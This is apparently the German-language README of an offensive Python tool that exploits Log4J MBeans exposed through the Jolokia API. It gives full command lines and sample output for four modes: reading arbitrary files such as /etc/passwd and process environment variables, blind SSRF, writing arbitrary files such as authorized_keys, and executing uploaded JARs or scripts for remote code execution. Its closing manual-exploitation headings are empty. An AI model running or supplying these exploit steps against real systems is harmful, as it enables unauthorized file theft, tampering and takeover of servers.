
Python3-Implementierung zur Ausnutzung von Log4J über Jolokia
Python3-Implementierung zum Nutzen und Ausnutzen von Log4J MBeans über Jolokia
Allgemeine Hilfe:
usage: log4jolokia.py [-h] [-u [USER]] [-p [PASSWD]] [--proxy [PROXY]] [-H [HEADER]] {exec_jar,write_file,read_file,exec_script} [{exec_jar,write_file,read_file,exec_script} ...] target [target ...]
positional arguments:
{exec_jar,write_file,read_file,exec_script}
choose mode: exec_jar | write_file | read_file | exec_script
target URL to jolokia (e.g. http://127.0.0.1:8161/console/jolokia)
options:
-h, --help show this help message and exit
-u [USER], --user [USER]
Jolokia username
-p [PASSWD], --passwd [PASSWD]
Jolokia password
--proxy [PROXY] Optional HTTP(S) Proxy (e.g. burp at http://127.0.0.1:8080)
-H [HEADER], --header [HEADER]
Other required custom HTTP headers (e.g. -H "Origin: http://localhost"
-H "Referrer: http://localhost")
Hinweis: Je nachdem, welchen Modus Sie auswählen, unterscheidet sich die Hilfe in einigen Abschnitten.
Das Programm hat die folgenden 4 Exploit-Modi:
Durch Ändern des Log4J-Attributs „ConfigLocationUri“ und Lesen des neuen Inhalts von „ConfigText“ (mithilfe der Funktion „getConfigText(String)“ oder durch Ausführen einer Jolokia-„read“-Aktion auf dem Attribut „ConfigText“) über die Jolokia-API kann ein Angreifer beliebige Dateien lesen.
Hinweis: In diesem Fall verwenden wir den Lesevektor „getConfigText(String)“, da wir die bytegenaue Darstellung der Dateiausgaben in der Kodierung „latin-1“ abrufen können.
Hinweis 2: Dieser Vektor kann auch verwendet werden, um ansonsten unerreichbare/interne Server zu erreichen:
Hilfe – Spezifische Parameter zum Lesen von Dateien:
$ python3 log4jolokia.py read_file http://a -h
***TRUNCATED***
-r [READ], --read [READ]
Absolute or relative path of a file to read on target (Use only with mode: read_file)
Example commands:
- Absolute Path:
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r /etc/passwd -u admin -p admin -H 'Origin: http://localhost'
- Relative Path:
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r ./artemis -u admin -p admin -H 'Origin: http://localhost'
- Specific Protocol:
-- FTP:
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r ftp://test:[email protected]:22/test -u admin -p admin -H 'Origin: http://localhost'
-- SMB (Windows only):
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r file:////127.0.0.1/C/test -u admin -p admin -H 'Origin: http://localhost'
-- HTTP SSRF (Usually no output a.k.a. Blind SSRF):
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r 'http://127.0.0.1:80/test?test=test' -u admin -p admin -H 'Origin: http://localhost'
Beispiel – „/etc/passwd“ lesen:
$ python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -r /etc/passwd
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[.] Using mbean org.apache.logging.log4j2:type=21263314
[.] Setting ConfigLocationUri to point to arbitrary location /etc/passwd
[+] Successfully set ConfigLocationUri to "/etc/passwd"
[.] Reading file output from ConfigText
[+] Content of "/etc/passwd":
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
***TRUNCATED***
Beispiel – „/proc/self/environ“ lesen (Inhalt enthält nicht druckbare Zeichen (z. B. Null-Bytes), daher wird die Ausgabe base64-kodiert):
$ python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -r /proc/self/environ
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[.] Using mbean org.apache.logging.log4j2:type=21263314
[.] Setting ConfigLocationUri to point to arbitrary location /proc/self/environ
[+] Successfully set ConfigLocationUri to "/proc/self/environ"
[.] Reading file output from ConfigText
[.] File "/proc/self/environ" contains non-printable characters, displaying base64 encoding
[+] Base64 content of "/proc/self/environ":
TEVTU09QRU49fCAvdXNyL2Jpbi9sZXNzcGlwZSAlcwBNQUlMPS92YXIvbWFpbC9jdGYAVVNFUj1jdGYATENfVElNRT1maV9GSS5VVEYtOABTSE***TRUNCATED***
Durch das Erstellen und Laden einer bösartigen Log4J-Konfiguration können wir die Werte der Parameter „RollingFile -> fileName“ (wohin geschrieben wird) und „Pattern“ (was geschrieben wird) ausnutzen, um beliebigen Inhalt an beliebige Orte zu schreiben. In diesem Fall erstellen wir bösartige Log4J-Konfigurationen im XML-Format und nutzen die Funktion „setConfigText(String, String)“.
Hinweis: Zum Schreiben komplexer Binärdateien wurden – da das XML-Format bestimmte eingeschränkte Steuerzeichen aufweist – andere unterstützte Konfigurationsformate (z. B. Properties) in einem zweistufigen Schreibprozess verwendet.
Hilfe – Spezifische Parameter zum Schreiben von Dateien:
$ python3 log4jolokia.py write_file http://a -h
***TRUNCATED***
-lf [LOCAL_FILE], --local_file [LOCAL_FILE]
Path to local file to be written on the target (Use only with mode: write_file)
-w [WRITE], --write [WRITE]
Path of file to be written on the target (Use only with mode: write_file)
-P [PERM], --perm [PERM]
Permissions of the file written on the target. Useful for files like "authorized_keys" that require "rw-------". (Default value is "rwxrwx---") (Use only with mode: write_file)
--tmp_dir [TMP_DIR] Location of a writable directory. (Default value is "/tmp")
E.g. Unix == /tmp
Windows == C:/Users/Public
Example command:
python3 log4jolokia.py write_file http://127.0.0.1:8161/console/jolokia/ -lf 00-ff.txt -w /tmp/test_write -u admin -p admin -H 'Origin: http://localhost'
Beispiel – „test“ nach „/tmp/test“ schreiben:
$ echo test > t.txt
$ python3 log4jolokia.py write_file http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -lf t.txt -w /tmp/test --proxy http://127.0.0.1:8080
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[.] Reading content from t.txt
[.] Generating Log4J configuration
[+] Generated Log4J XML configuration
[.] Using a double setConfigText in order to flush the buffer
[.] Using setConfigText to load the Log4J XML configuration
[+] Successfully called setConfigText()
[.] Checking that the file "/tmp/test" was written successfully on the target
[+] File "/tmp/test" has been successfully written on the target
Beispiel – Eine Datei mit ungültigen XML-Zeichen nach „/tmp/test2“ schreiben:
$ python3 log4jolokia.py write_file http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -lf 00-ff.txt -w /tmp/test2
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[.] Reading content from 00-ff.txt
[.] Generating Log4J configuration
[.] Invalid XML characters have been detected in the content
[.] Using a 2 step write technique (XML -> Properties -> File)
[+] Generated Log4J Properties configuration
[+] Embedded Properties configuration in a XML configuration
[.] Using a double setConfigText in order to flush the buffer
[.] Using setConfigText to load the Log4J XML configuration
[+] Successfully called setConfigText()
[+] File "/tmp/mal.properties" should have successfully been written on the target
[.] Using a double setConfigLocationUri in order to flush the buffer and finish writing "/tmp/mal.properties"
[.] Setting ConfigLocationUri to point to arbitrary location file:/tmp/mal.properties
[+] Successfully set ConfigLocationUri to "file:/tmp/mal.properties"
[.] Checking that the file "/tmp/test2" was written successfully on the target
[+] File "/tmp/test2" has been successfully written on the target
Über die im Modul „write_file“ vorgestellte Funktionalität schreiben wir ein beliebiges JAR auf das Zielsystem und verwenden dann die Funktion „jvmtiAgentLoad([Ljava.lang.String;)“, um beliebigen Java-Code auszuführen.
Hilfe – Spezifische Parameter zum Ausführen von JARs:
$ python3 log4jolokia.py exec_jar http://a -h
***TRUNCATED***
-j [JAR], --jar [JAR]
Path to local jar to be executes on the target (Use only with mode: exec_jar)
--tmp_dir [TMP_DIR] Location of a writable directory. (Default value is "/tmp")
E.g. Unix == /tmp
Windows == C:/Users/Public
Example command:
python3 log4jolokia.py exec_jar http://127.0.0.1:8161/console/jolokia/ -j mal_linux.jar -u admin -p admin -H 'Origin: http://localhost'
Valid jvmtiAgent JARs can be obtained from https://github.com/mbadanoiu/jvmtiAgentLoad-Exploit
Beispiel – JAR-Datei schreiben und ausführen:
$ python3 log4jolokia.py exec_jar http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -j mal_linux.jar
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[!!!] WARNING: You are about to write and execute the contents of "mal_linux.jar" on the target system. Make sure that:
- The JAR contains a valid JVM TI agent
- Once a JAR is successfully loaded:
-- No new JAR can be loaded until the Java application is restarted (a.k.a. pick your commands wisely because you only have one shot)
-- The JAR code will execute everytime the jvmtiAgentLoad() function is successfully called (result == "return code: 0")
If you agree with the above enter "yes" to continue: yes
[.] Reading content from mal_linux.jar
[.] Generating Log4J configuration
[.] Invalid XML characters have been detected in the content
[.] Using a 2 step write technique (XML -> Properties -> File)
[+] Generated Log4J Properties configuration
[+] Embedded Properties configuration in a XML configuration
[.] Using a double setConfigText in order to flush the buffer
[.] Using setConfigText to load the Log4J XML configuration
[+] Successfully called setConfigText()
[+] File "/tmp/mal.properties" should have successfully been written on the target
[.] Using a double setConfigLocationUri in order to flush the buffer and finish writing "/tmp/mal.properties"
[.] Setting ConfigLocationUri to point to arbitrary location file:/tmp/mal.properties
[+] Successfully set ConfigLocationUri to "file:/tmp/mal.properties"
[.] Checking that the file "/tmp/mal.jar" was written successfully on the target
[+] File "/tmp/mal.jar" has been successfully written on the target
[+] Successfully called jvmtiAgentLoad()
Hinweis: Wie in der „WARNUNG“ angegeben, führt das erneute Senden der nachfolgenden Anfragen mit neuen/geänderten (gültigen) JARs, nachdem Sie ein JVM-TI-Agent-JAR (Rückgabecode: 0) erfolgreich geladen haben, nur zur erneuten Ausführung des ursprünglich/zuerst geladenen JARs.
Durch Nutzung der integrierten Skriptunterstützungsfunktion von Log4J können wir eine bösartige Konfiguration mit beliebigen Skriptelementen injizieren.
Hinweis: Damit dieser Exploit funktioniert, muss Log4J so konfiguriert sein, dass der jeweilige Skripttyp erlaubt ist (standardmäßig sind keine Skripte erlaubt).
Hilfe – Spezifische Parameter zum Ausführen von Skripten:
$ python3 log4jolokia.py exec_script http://a -h
***TRUNCATED***
-sf [SCRIPT_FILE], --script_file [SCRIPT_FILE]
Path to local file containing the script to be executed on the target (Use only with mode: exec_script)
-l [LANGUAGE], --language [LANGUAGE]
Language of the script to be executed (E.g. javascript, groovy, beanshell, etc.) (Use only with mode: exec_script)
Example command:
python3 log4jolokia.py exec_script http://127.0.0.1:8161/console/jolokia/ -sf rce.js -l javascript -u admin -p admin -H 'Origin: http://localhost'
Beispiel – Skript ausführen:
$ python3 log4jolokia.py exec_script http://127.0.0.1:8161/console/jolokia/ -sf rce.js -l javascript -u admin -p admin -H 'Origin: http://localhost'
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=561b61ed
[!!!] WARNING: You are about to execute a javascript script from the "rce.js" file.
Keep in mind that this script will be triggered multiple times.
If you agree with the above enter "yes" to continue: yes
[.] Reading javascript script from rce.js
[.] Using setConfigText to load the Log4J XML configuration
[+] Successfully called setConfigText()
[+] The script should have been successfully executed
Hinweis: Dieser Modus lädt das jeweilige Skript, hat aber keine Möglichkeit zu erkennen, ob das Skript nach dem Laden erfolgreich ausgeführt wird oder stillschweigend fehlschlägt.
Manuelles Ausnutzungsbeispiel für den Modus „read_file“:
Manuelles Ausnutzungsbeispiel für den Modus „write_file“, der zu RCE führt:
Manuelles Ausnutzungsbeispiel für den Modus „exec_jar“:
Manuelles Ausnutzungsbeispiel für den Modus „exec_script“: